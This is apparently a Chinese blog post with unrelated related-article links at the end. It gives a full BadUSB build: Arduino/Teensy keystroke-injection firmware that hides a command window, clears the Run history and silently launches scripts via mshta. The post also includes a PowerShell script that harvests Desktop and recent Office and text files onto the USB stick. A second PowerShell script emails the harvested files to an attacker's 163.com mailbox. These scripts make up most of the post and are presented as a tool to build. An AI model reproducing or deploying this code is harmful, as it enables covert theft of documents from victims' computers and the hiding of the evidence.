HID攻击:USB HID攻击技术是一种利用USB接口伪造用户击键行为实施是攻击的方式。通过恶意USB HID设备连接主机后发送伪造的按键命令,篡改系统设置、运行恶意功能。这种技术区别于传统的USB攻击技术,它将恶意代码隐藏在USB设备固件中,设备成为了攻击的主体。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。HID attack 通过插入带有攻击向量的USB设备等方式,恶意代码直接就被加载执行,攻击操作也就瞬时发生。此类方式属于物理层面攻击。攻击者可以在一个芯片中,写入编程进去的恶意代码,诱导用户,或其他方式插入主机中,即可完成整个攻击操作。相对来说,攻击者控制了用户的键盘,则就可以说控制了对方主机的权限。

烧鹅:一种国内badusb,支持S.E.T,Kautilya套件生成攻击载荷,可以使用Arduino IDE编写自定义代码,自带sd卡槽,外表可以当成正常U盘使用,插入即可执行设定的teensy代码

百度U盘:检测当前插入的机器的内外网环境,若为内网环境,则复制重要文档到U盘中,若为外网环境,则将U盘中保存的文档上传到指定邮箱中

Arduino烧入代码

  void setup()

 {

   delay(5000);

   Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);

   Keyboard.set_key1(KEY_R);

   Keyboard.send_now();

   delay(100);

   Keyboard.print("cmd /T:01 /K mode CON: COLS=16 LINES=1");  //开启很小的cmd窗口

   Keyboard.set_key1(KEY_ENTER);

   Keyboard.send_now();

   delay(200);

   Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); //清理运行记录

   Keyboard.set_key1(KEY_ENTER);

   Keyboard.send_now();

   Keyboard.println("del /f /q %tmp%\\w.bat 2>nul");  //先删除可能存在的批处理

   Keyboard.set_key1(KEY_ENTER);

   Keyboard.send_now();

   Keyboard.println("copy con %tmp%\\w.bat");         //写入新的批处理文件

   Keyboard.send_now();

   Keyboard.println("@echo off");

   Keyboard.println(":lp");

   Keyboard.println("ping 127.1 -n 5 >nul");

   Keyboard.println("for /F %%A in ('wmic volume get driveletter^,label ^| find \"VICEN\"') do (set Fire=%%A)"); //利用wim查询指定U盘是否插入电脑

   Keyboard.println("mshta vbscript:createobject^(\"wscript.shell\"^).run^(\"%Fire%\\files\\Fire_shell.bat\",0^)^(window.close^)");//利用VBS隐藏执行bat

   Keyboard.set_modifier(MODIFIERKEY_CTRL); //保存以上写入的批处理

   Keyboard.set_key1(KEY_Z);

   Keyboard.send_now();

   Keyboard.set_modifier(0);

   Keyboard.set_key1(0);

   Keyboard.send_now();

   Keyboard.set_key1(KEY_ENTER);

   Keyboard.send_now();

   delay(200);

   Keyboard.println("mshta vbscript:createobject(\"wscript.shell\").run(\"%tmp%\\w.bat\",0)(window.close) && exit"); //VBS隐藏执行w.bat并退出

   Keyboard.set_key1(KEY_ENTER);

   Keyboard.send_now();

   Keyboard.set_modifier(0);  //释放所有按键

   Keyboard.set_key1(0);

   Keyboard.send_now();

  }

  void loop()

  {

  }

先在缓存中写入查找U盘盘符的脚本并执行,找到盘符后执行U盘中脚本。

Fire_shell.bat

@echo off

REM 设置外网主机地址(wwwhost)、局域网主机地址(geteway)

start Powershell Set-ExecutionPolicy RemoteSigned #开启powershell脚本执行权限

for /F %%A in ('wmic volume get driveletter^,label ^| find "VICEN"') do (set Fire=%%A)

set wwwhost=223.6.6.6

set geteway=192.168.1.1

ping -n 2 -w 200 %wwwhost% >nul 2>nul && (

  echo 外网

  mshta vbscript:createobject("wscript.shell").run("powershell %Fire%//files//Doccopy.ps1",0)(window.close)

) || (

  ping -n 2 -w 50 %geteway% >nul 2>nul && (

    echo 内网

	mshta vbscript:createobject("wscript.shell").run("powershell %Fire%//files//Docmail.ps1",0)(window.close)

  ) || (

    echo 没有连接网络

	mshta vbscript:createobject("wscript.shell").run("powershell %Fire%//files//Docmail.ps1",0)(window.close)

  )

)

Doccopy.ps1

function DirCopy($strDir)

{

    Dir -filter *.txt -recurse $strDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}

    Dir -filter *.doc -recurse $strDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}

    Dir -filter *.docx -recurse $strDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}

    Dir -filter *.xls -recurse $strDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}

    Dir -filter *.xlsx -recurse $strDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}

}

function Dirtarget($str)

{

    $target1=$shell.CreateShortcut($str).TargetPath

    if(Test-Path $target1){

        Copy-Item $target1 $copyToDir

    }

}

$folderDateTime = (get-date).ToString('d-M-y HHmmss')

$x= Split-Path -Parent $MyInvocation.MyCommand.Definition

$userDir = $x + '\data\Copyed Report ' + $folderDateTime

$zipFile = 'C:\Windows\' + 'Copyed Report ' + $folderDateTime+'.zip'

$fileSaveDir = New-Item  ($userDir) -ItemType Directory

$copyDirDesktop = (Get-ChildItem env:\userprofile).value + '\Desktop'

$copyDirRecent = "C:\Users\Administrator\Recent"

$copyToDir = New-Item $fileSaveDir'\Doc' -ItemType Directory

DirCopy $copyDirDesktop

$shell = New-Object -com "wscript.shell"

Dir -filter *.txt.lnk -recurse $CopyDirRecent | ForEach-Object {Dirtarget($_.FullName)}

Dir -filter *.doc.lnk -recurse $CopyDirRecent | ForEach-Object {Dirtarget($_.FullName)}

Dir -filter *.docx.lnk -recurse $CopyDirRecent | ForEach-Object {Dirtarget($_.FullName)}

Dir -filter *.xls.lnk -recurse $CopyDirRecent | ForEach-Object {Dirtarget($_.FullName)}

Dir -filter *.xlsx.lnk -recurse $CopyDirRecent | ForEach-Object {Dirtarget($_.FullName)}

function copy-ToZip($fileSaveDir){

    $srcdir = $fileSaveDir

    #$zipFile = 'C:\Windows\Report.zip'

    if(-not (test-path($zipFile))) {

        set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))

        (dir $zipFile).IsReadOnly = $false}

    $shellApplication = new-object -com shell.application

    $zipPackage = $shellApplication.NameSpace($zipFile)

    $files = Get-ChildItem -Path $srcdir

    foreach($file in $files) {

        $zipPackage.CopyHere($file.FullName)

        while($zipPackage.Items().Item($file.name) -eq $null){

            Start-sleep -seconds 1 }}}

copy-ToZip($fileSaveDir)

$savefile=$x+'\data'

Move-Item $zipFile $savefile

remove-item $fileSaveDir -recurse

利用Doccopy脚本复制内网机器桌面和最近浏览过得文本文档,并打包放到U盘的data文件夹下面。

Docmail.ps1

 $ErrorActionPreference='Stop'

 $x= Split-Path -Parent $MyInvocation.MyCommand.Definition

 $userDir = $x + '\data'

 function send(){

 Dir $userDir | ForEach-Object {

     $file = $_.FullName

     $SMTPServer = 'smtp.163.com'

     $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, )

     $SMTPInfo.EnableSsl = $true

     $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxx@163.com', 'xxxxxx');#用户名,密码(非登录密码,客户端授权码)

     $ReportEmail = New-Object System.Net.Mail.MailMessage

     $ReportEmail.From = 'xxxxx@163.com'

     $ReportEmail.To.Add('xxxxx@163.com')

     $ReportEmail.Subject = 'Data---'+$file

     $ReportEmail.Body =  'data including: '+$file

     $file1=$file

     $ReportEmail.Attachments.Add($file)

     $SMTPInfo.Timeout =

     $SMTPInfo.Send($ReportEmail)

     $ReportEmail.Attachments.Dispose()

     echo ''

     remove-item $file

 }

 }

 send

使用powershell调用邮箱需要先设置客户端授权码(授权码是用于登录第三方邮件客户端的专用密码,适用于登录以下服务: POP3/IMAP/SMTP/Exchange/CardDAV/CalDAV服务。)

以163邮箱为例,打开设置,

获取授权码后,把密码填为授权码。

使用badusb“烧鹅”制作“百度U盘”的更多相关文章

  1. 使用electron实现百度网盘悬浮窗口功能!

    相关依赖 里面使用了vuex vue vue-route storeJs storeJs 用来持久化vuex状态 展示 介绍说明 没有使用electron内置的-webkit-app-region: ...

  2. Visual Studio 2017 发布 15.5 版本,百度网盘离线安装包下载。

    Visual Studio 2017 15.5 版本已正式发布,同时发布的还有 Visual Studio for Mac 7.3 .此次更新包含主要性能改进,新特性以及 bug 修复.发行说明中文版 ...

  3. Visual Studio 2017 Enterprise 发布 15.3.3 版,附离线安装包百度网盘下载。

    Visual Studio 2017 Enterprise 发布 15.3.3 版,附离线安装包百度网盘下载. Visual Studio 2017 Enterprise 更新至 15.3.3 ,本安 ...

  4. 如何免费上传4G以上大文件至百度云网盘

    百度云网盘的容量高达2048G,因而如今使用百度云网盘的用户也越来越多, 但是百度云中如果要上传超过4G的大文件,必须要升级VIP才行,但这需要收费.那么,超过4G以上的大文件我们该怎样上传到百度云呢 ...

  5. linux 从百度网盘下载文件的方法

    linux 从百度网盘下载文件的方法 发表于2015 年 月 日由shenwang 方法1.wget wget是在Linux下开发的开放源代码的软件,作者是Hrvoje Niksic,后来被移植到包括 ...

  6. 还在为百度网盘下载速度太慢烦恼?chrome浏览器插件帮你解决!

    百度网盘已然成为分享型网盘中一家独大的“大佬”了.时代就是这样不管你喜不喜欢,上网总会遇到些百度网盘共享的文件需要下载.然而,百度网盘对免费用户的限速已经到了“感人”的地步了,常常十多KB/秒的速度真 ...

  7. mnist数据集下载——mnist数据集提供百度网盘下载地址

    mnist数据集是由深度学习大神 LeCun等人制作完成的数据集,mnist数据集也常认为是深度学习的“ Hello World!”. 官网:http://yann.lecun.com/exdb/mn ...

  8. 从零开始学Python网络爬虫PDF高清完整版免费下载|百度网盘

    百度网盘:从零开始学Python网络爬虫PDF高清完整版免费下载 提取码:wy36 目录 前言第1章 Python零基础语法入门 11.1 Python与PyCharm安装 11.1.1 Python ...

  9. 笨办法学Python 3|百度网盘免费下载|新手基础入门书籍

    点击下方即可百度网盘免费提取 百度网盘免费下载:笨办法学Python 3 提取码:to27 内容简介: 本书是一本Python入门书,适合对计算机了解不多,没有学过编程,但对编程感兴趣的读者学习使用. ...

随机推荐

  1. Windows工作原理

    Windows工作原理中心思想 Windows工作原理的中心思想就是“动态链接”概念.Windows自身带有一大套函数,应用程序就是通过调用这些函数来实现它的用户界面和在屏幕上显示文本与图形的.这些函 ...

  2. MySQL在使用group_concat()函数数据被截取

    遇到问题: 项目中有个需求,MySQL中存储的是树状的数据.现在给出一个节点,需要从Mysql数据库中取出这个节点下所有的节点.采用MySQL的函数. 函数如下: CREATE DEFINER=`ro ...

  3. 《构建之法》——Alpha2项目的测试

    这个作业属于哪个课程 课程的链接 这个作业要求在哪里 作业要求的链接 团队名称 Runningman 这个作业的目标 测试其他组的项目,互相借鉴 作业正文 作业正文 测试人姓名 陈嘉莹 测试人学号 2 ...

  4. [Leetcode]Rotated Sorted Array问题

    LeetCode上牵扯到Rotated Sorted Array问题一共有四题,主要是求旋转数组的固定值或者最小值,都是考察二分查找的相关知识.在做二分查找有关的题目时,需要特别注重边界条件和跳出条件 ...

  5. Paper Reading:Receptive Field Block Net for Accurate and Fast Object Detection

    论文:Receptive Field Block Net for Accurate and Fast Object Detection 发表时间:2018 发表作者:(Beihang Universi ...

  6. vccode配置c++ 编译环境

    https://blog.csdn.net/qq_43041976/article/details/88544632 https://www.cnblogs.com/bpf-1024/p/115970 ...

  7. 那些吓人的 Linux 命令

    本文转载于其它网站,原作者如有问题,请您及时联系我,及时删除! 哪些Linux命令会让人联想到妖魔鬼怪?不妨好好瞧一瞧! 每年一度的万圣节马上就要到来,是时候稍微关注一下Linux那吓人的一面了.哪些 ...

  8. python自动华 (四)

    Python自动化 [第四篇]:Python基础-装饰器 生成器 迭代器 Json & pickle 目录: 装饰器 生成器 迭代器 Json & pickle 数据序列化 软件目录结 ...

  9. PHP mysqli_commit() 函数

    关闭自动提交,做一些查询,然后提交查询: <?php // 假定数据库用户名:root,密码:123456,数据库:RUNOOB $con=mysqli_connect("localh ...

  10. Shell 05 Sed

    一.基本用方法 1.sed文本处理工具的用法 用法1:前置命令 | sed  [选项]  '条件指令' 用法2:sed  [选项]  '条件指令'  文件.. .. 注意:没有条件时候,默认所有条件, ...